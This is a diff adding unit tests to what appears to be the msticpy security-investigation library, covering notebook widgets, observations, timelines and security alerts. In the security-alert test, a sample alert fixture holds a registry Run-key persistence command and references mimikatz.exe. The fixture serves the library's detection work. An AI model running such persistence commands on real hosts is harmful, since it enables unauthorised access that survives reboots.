+        {"item_dict": {"one": "one-val", "two": "two-val", "three": "three-val"}},
+        ("one-val", "two-val", ("two", "three")),
+    ),
+    (
+        {"options": {"one": "one-val", "two": "two-val", "three": "three-val"}},
+        ("one-val", "two-val", ("two", "three")),
+    ),
+]
+
+
+@pytest.mark.parametrize("args, expected", _SEL_ITEM_PARAMS)
+def test_select_item(args, expected):
+    """Test SelectItem widget events."""
+    act_obj = _TestSelectAction()
+
+    sel_item = nbw.SelectItem(**args, action=act_obj.action)
+    check.equal(sel_item.value, expected[0])
+
+    sel_item.value = "two"
+    check.equal(sel_item.value, expected[1])
+    check.equal(act_obj.value, expected[1])
+
+    sel_item._w_filter.value = "t"
+    for item in sel_item._wgt_select.options:
+        if isinstance(item, tuple):
+            check.is_in(item[0], expected[2])
+        else:
+            check.is_in(item, expected[2])
+
+    sel_item._ipython_display_()
+
+
+def test_select_subset():
+    """Test SelectSubset widget events."""
+    src_items = ["one", "two", "three"]
+    sel_subs = nbw.SelectSubset(source_items=src_items, default_selected=["one"])
+    check.equal(sel_subs._select_list.options, ("one",))
+
+    sel_subs._w_filter.value = "t"
+    for item in sel_subs._source_list.options:
+        check.is_in(item, ("two", "three"))
+    sel_subs._w_filter.value = ""
+
+    sel_subs._select_list.value = ["one"]
+    sel_subs._b_del.click()
+    check.is_false(sel_subs._select_list.options)
+    sel_subs._source_list.value = ["two"]
+    sel_subs._b_add.click()
+    check.equal(sel_subs._select_list.options, ("two",))
+
+    sel_subs._b_add_all.click()
+    check.equal(len(sel_subs._select_list.options), len(src_items))
+    for opt in src_items:
+        check.is_in(opt, sel_subs._select_list.options)
+
+    sel_subs._b_del_all.click()
+    check.is_false(sel_subs._select_list.options)
+
+    sel_subs._ipython_display_()
+
+
+_NBWIDGETS_ATTR_TEST = [
+    (nbw.Lookback, ["lookback"], None, {}),
+    (nbw.QueryTime, None, None, {}),
+    (nbw.GetText, None, None, {}),
+    (nbw.Progress, None, None, {"completed_len": 10}),
+    (nbw.OptionButtons, None, None, {}),
+]
+
+
+def _nbw_ids(tests):
+    """Return IDs for widget attribute tests."""
+    return [test[0].__name__ for test in tests]
+
+
+@pytest.mark.parametrize(
+    "widget, w_props, w_funcs, args",
+    _NBWIDGETS_ATTR_TEST,
+    ids=_nbw_ids(_NBWIDGETS_ATTR_TEST),
+)
+def test_widget_attribs(widget, w_props, w_funcs, args):
+    """Check widgets expected properties."""
+    def_props = ["value", "layout"]
+    def_funcs = ["display", "_ipython_display_"]
+
+    wgt = widget(**args)
+    test_props = def_props + w_props if w_props else def_props
+    for prop in test_props:
+        getattr(wgt, prop)
+
+    test_funcs = def_funcs + w_funcs if w_funcs else def_funcs
+    for func in test_funcs:
+        f_attr = getattr(wgt, func)
+        f_attr()
+
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "NotebookWidgets.ipynb"
+
+
+# @pytest.mark.skipif(
+#     not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+# )
+def test_widgets_notebook():
+    """Run widgets notebook."""
+    nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+    abs_path = Path(_NB_FOLDER).absolute()
+    with open(nb_path, encoding="utf-8") as f:
+        nb = nbformat.read(f, as_version=4)
+    ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+    try:
+        ep.preprocess(nb, {"metadata": {"path": abs_path}})
+    except CellExecutionError:
+        nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+        msg = f"Error executing the notebook '{nb_path}'.\n"
+        msg += f"See notebook '{nb_err}' for the traceback."
+        print(msg)
+        with open(nb_err, mode="w", encoding="utf-8") as f:
+            nbformat.write(nb, f)
+        raise
diff --git a/tests/nbtools/test_observationlist.py b/tests/nbtools/test_observationlist.py
new file mode 100644
index 000000000..c5cb2d1b0
--- /dev/null
+++ b/tests/nbtools/test_observationlist.py
@@ -0,0 +1,116 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Unit test class for Observations class."""
+# imports
+import unittest
+import os
+
+from msticpy.nbtools.observationlist import Observation, Observations
+from msticpy._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_test_data_folders = [
+    d for d, _, _ in os.walk(os.getcwd()) if d.endswith("/tests/testdata")
+]
+if len(_test_data_folders) == 1:
+    _TEST_DATA = _test_data_folders[0]
+else:
+    _TEST_DATA = "./tests/testdata"
+
+
+_TEST_FIELDS = {
+    "caption",
+    "description",
+    "data",
+    "data_type",
+    "link",
+    "score",
+    "tags",
+    "additional_properties",
+}
+
+
+class TestObservations(unittest.TestCase):
+    """Unit test class."""
+
+    def test_create_observation_class(self):
+
+        self.assertIn("caption", Observation.required_fields())
+        self.assertIn("data", Observation.required_fields())
+
+        fields_set = set(Observation.all_fields())
+
+        self.assertEqual(len(fields_set.symmetric_difference(_TEST_FIELDS)), 0)
+
+        # Shouldn't be able to create an observation without required
+        # properties
+        with self.assertRaises(TypeError):
+            Observation()
+
+        obs = Observation(caption="My caption", data=fields_set)
+
+        ob1 = Observation(
+            caption="O1",
+            description="Description1",
+            data=obs,
+            data_type="object",
+            tags=["t1", "t2", "t3"],
+        )
+        ob1.additional_properties["foo_field"] = "xyz"
+        self.assertEqual(ob1.caption, "O1")
+        self.assertEqual(ob1.description, "Description1")
+        self.assertEqual(ob1.data, obs)
+        self.assertEqual(ob1.data_type, "object")
+        self.assertEqual(ob1.tags, ["t1", "t2", "t3"])
+        self.assertIn("foo_field", ob1.additional_properties)
+        self.assertEqual("xyz", ob1.additional_properties["foo_field"])
+
+    def test_create_observations(self):
+        obs_list = Observations()
+
+        obs = Observation(caption="My caption", data=_TEST_FIELDS)
+
+        ob1 = Observation(
+            caption="O1",
+            description="Description1",
+            data=_TEST_FIELDS,
+            data_type="object",
+            tags=["t1", "t2", "t3"],
+        )
+        obs_list.add_observation(obs)
+        obs_list.add_observation(ob1)
+        self.assertEqual(len(obs_list.observations), 2)
+
+        # adding another with same caption should overwrite
+        ob2 = Observation(
+            caption="O1",
+            description="Description2",
+            data=_TEST_FIELDS,
+            data_type="object",
+            tags=["t1", "t2", "t3"],
+        )
+        obs_list.add_observation(ob2)
+        self.assertEqual(len(obs_list.observations), 2)
+        self.assertEqual(obs_list.observations["O1"].description, "Description2")
+        self.assertEqual(obs_list.observations["O1"], ob2)
+
+        # Add observation with keywords
+        obs_list.add_observation(
+            caption="O3",
+            description="Description1",
+            data=_TEST_FIELDS,
+            data_type="object",
+            tags=["t1", "t2", "t3"],
+            foo="some extra data",
+        )
+        self.assertEqual(len(obs_list.observations), 3)
+        self.assertEqual(
+            obs_list.observations["O3"].additional_properties["foo"], "some extra data"
+        )
+
+        obs_list.display_observations()
diff --git a/tests/nbtools/test_security_alert.py b/tests/nbtools/test_security_alert.py
new file mode 100644
index 000000000..a05f6be44
--- /dev/null
+++ b/tests/nbtools/test_security_alert.py
@@ -0,0 +1,321 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""security_alert test class."""
+import unittest
+
+import networkx as nx
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.data.query_defns import DataEnvironment
+from msticpy.datamodel import entities
+from msticpy.nbtools.nbdisplay import format_alert
+from msticpy.nbtools.security_alert import SecurityAlert
+from msticpy.nbtools.security_alert_graph import create_alert_graph
+
+# pylint: disable=redefined-outer-name
+
+sample_alert = {
+    "StartTimeUtc": "2018-09-27 16:59:16",
+    "EndTimeUtc": "2018-09-27 16:59:16",
+    "ProviderAlertId": "b6329e79-0a94-4035-beee-c2e2657b71e3",
+    "SystemAlertId": "2518642332435550951_b6329e79-0a94-4035-beee-c2",
+    "ProviderName": "Detection",
+    "VendorName": "Microsoft",
+    "AlertType": "RegistryPersistence",
+    "AlertDisplayName": "Windows registry persistence method detected",
+    "Severity": "Low",
+    "IsIncident": False,
+    "ExtendedProperties": {
+        "resourceType": "Non-Azure Resource",
+        "enrichment_tas_threat__reports": '{"Kind":"MultiLink","DisplayValueToUrlDictionary":{"Report: Registry Persistence":"https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Registry-Persistence.pdf"}}',
+        "parent process id": "0x940",
+        "account logon id": "0x3e7",
+        "User SID": "S-1-5-18",
+        "command line": 'reg  add hkey_current_user\\software\\microsoft\\windows\\currentversion\\run /v cclientcleandll /t reg_sz /d "c:\\windows\\temp\\epdeldll.bat" /f',
+        "process name": "c:\\windows\\system32\\reg.exe",
+        "process id": "0x1670",
+        "domain name": "DOM",
+        "user name": "DOM\\TESTHOST$",
+        "parent process": "cmd.exe",
+        "Persisted Process": "c:\\windows\\temp\\epdeldll.bat",
+    },
+    "CompromisedEntity": "TESTHOST",
+    "Entities": [
+        {
+            "Type": "host",
+            "$id": "1",
+            "HostName": "TESTHOST",
+            "DnsDomain": "DOM.CONTOSO.COM",
+            "IsDomainJoined": True,
+            "NTDomain": "DOM",
+            "NetBiosName": "TESTHOST",
+            "OsVersion": None,
+            "OSFamily": "Windows",
+        },
+        {
+            "Type": "file",
+            "$id": "2",
+            "Directory": "c:\\windows\\system32",
+            "Name": "cmd.exe",
+        },
+        {
+            "Type": "process",
+            "$id": "3",
+            "CommandLine": "",
+            "Host": {"$ref": "1"},
+            "ProcessId": "0x940",
+            "ImageFile": {"$ref": "2"},
+        },
+        {
+            "Type": "account",
+            "$id": "4",
+            "Name": "TESTHOST$",
+            "IsDomainJoined": True,
+            "NTDomain": "DOM",
+            "Host": {"$ref": "1"},
+            "LogonId": "0x3e7",
+            "Sid": "S-1-5-18",
+        },
+        {
+            "Type": "file",
+            "$id": "5",
+            "Directory": "c:\\windows\\system32",
+            "Name": "reg.exe",
+        },
+        {
+            "Type": "process",
+            "$id": "6",
+            "CommandLine": 'reg  add hkey_current_user\\software\\microsoft\\windows\\currentversion\\run /v cclientcleandll /t reg_sz /d "c:\\windows\\temp\\epdeldll.bat" /f',
+            "Host": {"$ref": "1"},
+            "ProcessId": "0x1670",
+            "ImageFile": {"$ref": "5"},
+            "CreationTimeUtc": "2018-09-27T16:59:16.4449048Z",
+            "ParentProcess": {"$ref": "3"},
+            "Account": {"$ref": "4"},
+            "ElevationToken": "Default",
+        },
+        {
+            "Type": "registry-key",
+            "$id": "7",
+            "Key": "software\\microsoft\\windows\\currentversion\\run",
+            "Hive": "HKEY_CURRENT_USER",
+        },
+        {
+            "Type": "registry-value",
+            "$id": "8",
+            "ValueType": "Unknown",
+            "Key": {"$ref": "7"},
+        },
+        {
+            "Type": "registry-value",
+            "$id": "9",
+            "Name": "cclientcleandll",
+            "ValueType": "String",
+            "Key": {"$ref": "7"},
+            "Value": "System.Byte[]",
+        },
+        {
+            "$id": "10",
+            "Algorithm": "SHA256",
+            "Value": "D41D122374906FE97D7185DBB2C767B8D98DF9DEC564C4A204028DFD892496BA",
+            "Type": "filehash",
+        },
+        {
+            "$id": "11",
+            "Directory": "%OSDRIVE%\\WINDOWSAZURE\\SECAGENT",
+            "Name": "WASECAGENTPROV.EXE",
+            "Host": {"$ref": "1"},
+            "FileHashes": [{"$ref": "10"}],
+            "Type": "file",
+        },
+        {
+            "$id": "15",
+            "ProcessId": "2004",
+            "CreationTimeUtc": "2021-04-11T04:00:00.7445225Z",
+            "ImageFile": {"$id": "16", "Name": "mimikatz.exe", "Type": "file"},
+            "CreatedTimeUtc": "2021-04-11T04:00:00.7445225Z",
+            "Type": "process",
+        },
+        {"$ref": "16"},
+        {
+            "$id": "17",
+            "ProcessId": "4764",
+            "CreationTimeUtc": "2021-04-10T06:00:00.6264567Z",
+            "ImageFile": {"$ref": "16"},
+            "CreatedTimeUtc": "2021-04-10T06:00:00.6264567Z",
+            "Type": "process",
+        },
+        {
+            "$id": "18",
+            "ProcessId": "4765",
+            "CreationTimeUtc": "2021-04-10T06:00:01.6264567Z",
+            "ImageFile": {"$ref": "16"},
+            "CreatedTimeUtc": "2021-04-10T06:00:01.6264567Z",
+            "Type": "process",
+        },
+        {
+            "$id": "19",
+            "ProcessId": "4766",
+            "CreationTimeUtc": "2021-04-10T06:00:02.6264567Z",
+            "ImageFile": {"$ref": "16"},
+            "CreatedTimeUtc": "2021-04-10T06:00:02.6264567Z",
+            "Type": "process",
+        },
+    ],
+    "ConfidenceLevel": "Unknown",
+    "ConfidenceScore": None,
+    "ConfidenceReasons": None,
+    "Intent": "Persistence",
+    "ExtendedLinks": None,
+    "AzureResourceId": None,
+    "AzureResourceSubscriptionId": None,
+    "TenantId": "b6329e79-0a94-4035-beee-c2e2657b71e3",
+    "WorkspaceId": "b6329e79-0a94-4035-beee-c2e2657b71e3",
+    "AgentId": "b6329e79-0a94-4035-beee-c2e2657b71e3",
+    "SourceComputerId": "b6329e79-0a94-4035-beee-c2e2657b71e3",
+    "SystemSource": "Non-Azure",
+    "WorkspaceSubscriptionId": "b6329e79-0a94-4035-beee-c2e2657b71e3",
+    "WorkspaceResourceGroup": "test-east-us",
+    "TimeGeneratedUtc": "2018-09-27 16:59:47",
+}
+
+
+class TestSecurityAlert(unittest.TestCase):
+    def setUp(self):
+        self.raw_alert = pd.Series(sample_alert)
+        self.raw_alert["StartTimeUtc"] = pd.to_datetime(self.raw_alert["StartTimeUtc"])
+        self.raw_alert["EndTimeUtc"] = pd.to_datetime(self.raw_alert["EndTimeUtc"])
+        self.raw_alert["TimeGeneratedUtc"] = pd.to_datetime(
+            self.raw_alert["TimeGeneratedUtc"]
+        )
+
+    def test_alert_import(self):
+        alert = SecurityAlert(self.raw_alert)
+
+        str_alert = str(alert)
+        self.assertIsNotNone(str_alert)
+        self.assertIsNotNone(alert)
+        self.assertGreaterEqual(len(alert.entities), 0)
+        self.assertGreaterEqual(len(alert.ExtendedProperties), 0)
+        self.assertGreaterEqual(len(alert["ExtendedProperties"]), 0)
+        self.assertIn("StartTimeUtc", alert)
+        self.assertIn("EndTimeUtc", alert)
+        self.assertIn("SystemAlertId", alert)
+        self.assertIn("SystemAlertId", alert)
+        self.assertIn("ProviderName", alert)
+        self.assertIn("VendorName", alert)
+        self.assertIn("AlertType", alert)
+        self.assertIn("AlertDisplayName", alert)
+        self.assertIn("Severity", alert)
+        self.assertIn("IsIncident", alert)
+
+        str_alert = str(alert)
+        self.assertIsNotNone(str_alert)
+        repr_alert = repr(alert)
+        self.assertIsNotNone(repr_alert)
+
+        self.assertIsNotNone(alert.primary_host)
+        self.assertEqual("TESTHOST", alert.primary_host.HostName)
+        self.assertIsNotNone(alert.primary_process)
+        self.assertIsNotNone(alert.primary_process.ProcessFilePath)
+        self.assertEqual(
+            "c:\\windows\\system32\\reg.exe", alert.primary_process.ProcessFilePath
+        )
+        self.assertIsNotNone(alert.primary_account)
+        self.assertEqual("TESTHOST$", alert.primary_account.Name)
+        self.assertEqual("DOM\\TESTHOST$", alert.primary_account.qualified_name)
+        self.assertEqual("0x3e7", alert.get_logon_id())
+
+        self.assertIn("Computer", alert.host_filter(operator="=="))
+        self.assertTrue(alert.is_in_log_analytics)
+        self.assertTrue(alert.is_in_workspace)
+        self.assertFalse(alert.is_in_azure_sub)
+        self.assertIsNotNone(alert.host_filter(operator="=="))
+        self.assertIn("true", alert.subscription_filter(operator="=="))
+
+        self.assertEqual(4, len(alert.get_entities_of_type(entity_type="file")))
+        self.assertEqual(6, len(alert.get_entities_of_type(entity_type="process")))
+        self.assertEqual(1, len(alert.get_entities_of_type(entity_type="filehash")))
+        self.assertEqual(
+            2, len(alert.get_entities_of_type(entity_type="registryvalue"))
+        )
+        self.assertEqual(1, len(alert.get_entities_of_type(entity_type="registrykey")))
+        self.assertEqual(1, len(alert.get_entities_of_type(entity_type="account")))
+        self.assertEqual(1, len(alert.get_entities_of_type(entity_type="host")))
+
+        self.assertGreater(len(alert.query_params), 5)
+        self.assertEqual(alert.data_family, entities.OSFamily.Windows)
+        self.assertEqual(alert.data_environment, DataEnvironment.LogAnalytics)
+
+    def test_alert_display(self):
+        alert = SecurityAlert(self.raw_alert)
+        entity_str = ", ".join(str(e) for e in alert.entities)
+        self.assertIsNotNone(entity_str)
+        alert_html = alert.to_html(show_entities=True)
+        self.assertIsNotNone(alert_html)
+        alert_html = alert.to_html(show_entities=False)
+        self.assertIsNotNone(alert_html)
+
+        alert_html = format_alert(alert)
+        self.assertIsNotNone(alert_html)
+        alert_html = format_alert(self.raw_alert)
+        self.assertIsNotNone(alert_html)
+
+    def test_alert_graph(self):
+        alert = SecurityAlert(self.raw_alert)
+        alert_graph = create_alert_graph(alert)
+        self.assertIsNotNone(alert_graph)
+        self.assertLessEqual(5, len(alert_graph.nodes))
+
+    def test_alert_entities(self):
+        alert = SecurityAlert(self.raw_alert)
+        for ent in alert.entities:
+            self.assertIsNotNone(ent.description_str)
+
+
+@pytest.fixture(scope="module")
+def test_alert():
+    raw_alert = pd.Series(sample_alert)
+    raw_alert["StartTimeUtc"] = pd.to_datetime(raw_alert["StartTimeUtc"])
+    raw_alert["EndTimeUtc"] = pd.to_datetime(raw_alert["EndTimeUtc"])
+    raw_alert["TimeGeneratedUtc"] = pd.to_datetime(raw_alert["TimeGeneratedUtc"])
+    return raw_alert
+
+
+def test_alert_native_graph(test_alert):
+    alert = SecurityAlert(test_alert)
+    graph = None
+    for ent in alert.entities:
+        if graph is None:
+            graph = ent.to_networkx()
+        else:
+            if not graph.has_node(ent):
+                graph = nx.compose(graph, ent.to_networkx())
+    check.greater_equal(len(graph.nodes), 1)
+
+    alert_ent = entities.Alert(alert)
+    # alert_graph = alert_ent.to_networkx()
+    # nx_alert_node = next(iter(alert_graph.nodes))
+    # graph = nx.compose(alert_graph, graph)
+
+    # Get the sets of components
+    connected_components = list(nx.connected_components(graph)).copy()
+    for sub_graph in connected_components:
+        # connect alert to most connected entities
+        node_neighbors = [
+            (node, len(list(nx.neighbors(graph, node)))) for node in sub_graph
+        ]
+        most_connected_nodes = [
+            node for node, neighbors in node_neighbors if neighbors > 1
+        ]
+        node_list = most_connected_nodes or [node for node, count in node_neighbors]
+        for node in node_list:
+            # if node != nx_alert_node:
+            graph.add_edge(alert_ent, node, name=node.__class__.__name__)
+
+    check.equal(len(list(nx.connected_components(graph))), 1)
+    # print("\n".join([str((node, len(list(nx.neighbors(graph, node))))) for node in sub_graphs[0]]))
diff --git a/tests/nbtools/test_security_event.py b/tests/nbtools/test_security_event.py
new file mode 100644
index 000000000..c8e26e5b0
--- /dev/null
+++ b/tests/nbtools/test_security_event.py
@@ -0,0 +1,37 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Security Event test class."""
+import unittest
+import os
+
+import pandas as pd
+
+from msticpy.nbtools.security_event import SecurityEvent
+
+
+_test_data_folders = [
+    d for d, _, _ in os.walk(os.getcwd()) if d.endswith("/tests/testdata")
+]
+if len(_test_data_folders) == 1:
+    _TEST_DATA = _test_data_folders[0]
+else:
+    _TEST_DATA = "./tests/testdata"
+
+
+class TestSecurity(unittest.TestCase):
+    """Unit test class."""
+
+    def setUp(self):
+        input_file = os.path.join(_TEST_DATA, "processes_on_host.csv")
+        self.input_df = pd.read_csv(input_file)
+
+    def test_4688_events(self):
+
+        for idx, row in self.input_df[0:5].iterrows():
+            test_event = SecurityEvent(src_row=row)
+            self.assertGreaterEqual(len(test_event.entities), 4)
+
+            self.assertGreaterEqual(len(test_event.properties), 19)
diff --git a/tests/nbtools/test_ti_browser.py b/tests/nbtools/test_ti_browser.py
new file mode 100644
index 000000000..0484484ae
--- /dev/null
+++ b/tests/nbtools/test_ti_browser.py
@@ -0,0 +1,40 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""test TI Browser."""
+from pathlib import Path
+import pandas as pd
+import pytest_check as check
+import pytest
+
+from msticpy.nbtools.ti_browser import get_ti_select_options, ti_details_display
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="module")
+def ti_results():
+    """Test fixture to read Dataframe."""
+    df_path = Path(TEST_DATA_PATH).joinpath("ti_results.df.pkl")
+    return pd.read_pickle(df_path)
+
+
+def test_extract_options(ti_results):
+    """Test extracting select list options from data."""
+    output = get_ti_select_options(ti_results)
+    check.equal(len(output), 9)
+    output = get_ti_select_options(ti_results, severities=["warning"])
+    check.equal(len(output), 4)
+
+
+def test_display_function(ti_results):
+    """Test getting and executing the display function."""
+    disp_func = ti_details_display(ti_results)
+    for _, row in ti_results.iterrows():
+        html = disp_func((row.Ioc, [row.Provider]))
+        check.is_in("Reference:", html.data)
+        check.is_in(f"Provider: {row.Provider}", html.data)
diff --git a/tests/nbtools/test_timeline.py b/tests/nbtools/test_timeline.py
new file mode 100644
index 000000000..e7bd12cdc
--- /dev/null
+++ b/tests/nbtools/test_timeline.py
@@ -0,0 +1,284 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test timeline."""
+import os
+from pathlib import Path
+from typing import Any, Dict, List, Tuple
+
+import pandas as pd
+import pytest
+import nbformat
+from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
+
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+from msticpy.common.exceptions import MsticpyParameterError
+from msticpy.nbtools.timeline import display_timeline, display_timeline_values
+from msticpy.nbtools.timeline_duration import display_timeline_duration
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="module")
+def data():
+    """Return DataFrame."""
+    f_path = Path(TEST_DATA_PATH).joinpath("processes_on_host.csv")
+    return _update_timestamps(
+        pd.read_csv(
+            str(f_path), parse_dates=["TimeGenerated", "TimeCreatedUtc"], index_col=0
+        )
+    ).head(100)
+
+
+@pytest.fixture(scope="module")
+def data_net():
+    """Return DataFrame."""
+    f_path = Path(TEST_DATA_PATH).joinpath("az_net_flows.csv")
+    return _update_timestamps(
+        pd.read_csv(
+            str(f_path),
+            parse_dates=["TimeGenerated", "FlowStartTime", "FlowEndTime"],
+            index_col=0,
+        ).head(100)
+    )
+
+
+def _update_timestamps(data):
+    date_cols = data.select_dtypes("datetime").columns
+    for col in date_cols:
+        now_delta = pd.Timestamp("now") - data[col].max()
+        data[col] = data[col] + now_delta
+    return data
+
+
+@pytest.fixture(scope="module")
+def data_dict(data, data_net):
+    """Return timeline dict parameter."""
+    return {
+        "Primary": {
+            "data": data,
+            "time_column": "TimeGenerated",
+            "source_columns": ["Computer", "NewProcessName"],
+            "color": "navy",
+        },
+        "Secondary": {
+            "data": data_net,
+            "time_column": "TimeGenerated",
+            "source_columns": ["VMRegion", "AllExtIPs"],
+            "color": "green",
+        },
+    }
+
+
+def _get_event(data, n_events):
+    return data.sample(n_events)
+
+
+def _get_data_time(data, n_times):
+    if n_times == 1:
+        return data.sample(n_times).iloc[0]["TimeGenerated"]
+    else:
+        return [
+            (time, "label") for time in data.sample(n_times)["TimeGenerated"].tolist()
+        ]
+
+
+TIMELINE_COMMON_ARGS: List[Tuple[Dict[str, List[Any]], List[Any]]] = [
+    ({"color": ["green", "navy"]}, [True, True]),
+    ({"group_by": [None, "Account"]}, [True, True]),
+    ({"height": [None, 500, 1000]}, [True, True, True]),
+    ({"legend": ["inline", "left", "right", "none"]}, [True, True, True, True]),
+    ({"range_tool": [True, False]}, [True, True]),
+    ({"time_column": ["TimeGenerated", "TimeCreatedUtc"]}, [True, True]),
+    ({"title": [None, "Test timeline"]}, [True, True]),
+    ({"width": [0, 300, 1000]}, [True, True, True]),
+    ({"yaxis": [True, False]}, [True, True]),
+]
+
+TL_SRC_COLS = [
+    (
+        {"source_columns": [None, ["Computer", "NewProcessName"], ["OtherCol"]]},
+        [True, True, (KeyError, MsticpyParameterError)],
+    )
+]
+
+TL_ONLY_ARGS: List[Tuple[Dict[str, List[Any]], List[Any]]] = [
+    ({"overlay_color": [None, "green"]}, [True, True]),
+    ({"overlay_data": ["overlay_data"]}, [True]),
+    ({"ygrid": [True, False]}, [True, True]),
+    ({"xgrid": [True, False]}, [True, True]),
+    ({"hide": [True, False]}, [True, True]),
+]
+
+TIMELINE_ALL = TIMELINE_COMMON_ARGS + TL_ONLY_ARGS + TL_SRC_COLS
+
+
+def _get_test_ids(test_list):
+    return [next(iter(test[0])) for test in test_list]
+
+
+@pytest.mark.parametrize(
+    "param, expected", TIMELINE_ALL, ids=_get_test_ids(TIMELINE_ALL)
+)
+def test_timeline(data, data_net, param, expected):
+    """Test display_timeline."""
+    for param, p_vals in param.items():
+        for idx, p_val in enumerate(p_vals):
+            expect_result = expected[idx]
+            print(idx, expect_result)
+
+            params = {param: p_val}
+            if p_val == "overlay_data":
+                params["overlay_data"] = data_net
+            print(params)
+            if isinstance(expect_result, bool):
+                display_timeline(data, **params)
+                data.mp_timeline.plot(**params)
+            else:
+                with pytest.raises(expect_result):
+                    display_timeline(data, **params)
+                    data.mp_timeline.plot(**params)
+
+
+TIME_LINE_REF_ARGS = [
+    ("ref_event", {"ref_event": (_get_event, 1)}),
+    ("ref_time", {"ref_time": (_get_data_time, 1)}),
+    (
+        "ref_events",
+        {
+            "ref_events": (_get_event, 5),
+            "ref_time_col": "TimeGenerated",
+            "ref_col": "Computer",
+        },
+    ),
+    ("ref_times", {"ref_times": (_get_data_time, 5)}),
+    ("alert", {"alert": (_get_event, 1)}),
+]
+
+
+def _get_dict_test_ids(test_list):
+    return [test[0] for test in test_list]
+
+
+@pytest.mark.parametrize(
+    "param", TIME_LINE_REF_ARGS, ids=_get_dict_test_ids(TIME_LINE_REF_ARGS)
+)
+def test_timeline_refs(data, param):
+    """Test display_timeline with reference items."""
+    params = {}
+    test_name, test_def = param
+    for p_name, p_def in test_def.items():
+        if isinstance(p_def, tuple):
+            func, f_param = p_def
+            p_value = func(data, f_param)
+            params[p_name] = p_value
+        else:
+            params[p_name] = p_def
+        print(test_name, ",  params:", params)
+        display_timeline(data, **params)
+
+
+def test_timeline_dict(data_dict):
+    """Test display_timeline_dict."""
+    display_timeline(data_dict)
+
+
+TL_VALUES_ARGS: List[Tuple[Dict[str, List[Any]], List[Any]]] = [
+    ({"kind": ["circle", ["circle", "line", "vbar"]]}, [True, True]),
+    ({"kind_grp": ["circle", ["circle", "line", "vbar"]]}, [True, True]),
+    ({"leg_grp": ["inline", "left", "right", "none"]}, [True, True, True, True]),
+]
+
+TIMELINE_VALUES = TIMELINE_COMMON_ARGS + TL_SRC_COLS + TL_VALUES_ARGS
+
+
+@pytest.mark.parametrize(
+    "param, expected", TIMELINE_VALUES, ids=_get_test_ids(TIMELINE_VALUES)
+)
+def test_timeline_values(data, param, expected):
+    """Test display_timeline_values."""
+    for param, p_vals in param.items():
+
+        for idx, p_val in enumerate(p_vals):
+            expect_result = expected[idx]
+            if param == "kind_grp":
+                params = {"kind": p_val, "group_by": "Account"}
+            elif param == "leg_grp":
+                params = {"legend": p_val, "group_by": "Account"}
+            else:
+                params = {param: p_val}
+            print(idx, expect_result)
+            print("params:", params)
+            if isinstance(expect_result, bool):
+                display_timeline_values(data, value_col="EventID", **params)
+                data.mp_timeline.plot_values(value_col="EventID", **params)
+            else:
+                with pytest.raises(expect_result):
+                    display_timeline_values(data, value_col="EventID", **params)
+                    data.mp_timeline.plot_values(value_col="EventID", **params)
+
+
+TIMELINE_DURATION_ARGS: List[Tuple[Dict[str, List[Any]], List[Any]]] = [
+    ({"color": ["green", "navy"]}, [True, True]),
+    ({"height": [None, 500, 1000]}, [True, True, True]),
+    ({"range_tool": [True, False]}, [True, True]),
+    ({"time_column": ["TimeGenerated", "TimeCreatedUtc"]}, [True, True]),
+    ({"title": [None, "Test timeline"]}, [True, True]),
+    ({"width": [0, 300, 1000]}, [True, True, True]),
+    ({"yaxis": [True, False]}, [True, True]),
+    ({"ygrid": [True, False]}, [True, True]),
+    ({"xgrid": [True, False]}, [True, True]),
+    ({"hide": [True, False]}, [True, True]),
+]
+
+
+@pytest.mark.parametrize(
+    "param, expected", TIMELINE_DURATION_ARGS, ids=_get_test_ids(TIMELINE_DURATION_ARGS)
+)
+def test_timeline_duration(data, param, expected):
+    """Test display_timeline_duration."""
+    for param, p_vals in param.items():
+        for idx, p_val in enumerate(p_vals):
+            expect_result = expected[idx]
+            params = {param: p_val}
+            print(idx, expect_result)
+            print("params:", params)
+            if isinstance(expect_result, bool):
+                display_timeline_duration(data, group_by="Account", **params)
+                data.mp_timeline.plot_duration(group_by="Account", **params)
+            else:
+                with pytest.raises(expect_result):
+                    display_timeline_duration(data, value_col="Account", **params)
+                    data.mp_timeline.plot_duration(group_by="Account", **params)
+
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "EventTimeline.ipynb"
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_timeline_controls():
+    nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+    abs_path = Path(_NB_FOLDER).absolute()
+    with open(nb_path) as f:
+        nb = nbformat.read(f, as_version=4)
+    ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+    try:
+        ep.preprocess(nb, {"metadata": {"path": abs_path}})
+    except CellExecutionError:
+        nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+        msg = f"Error executing the notebook '{nb_path}'.\n"
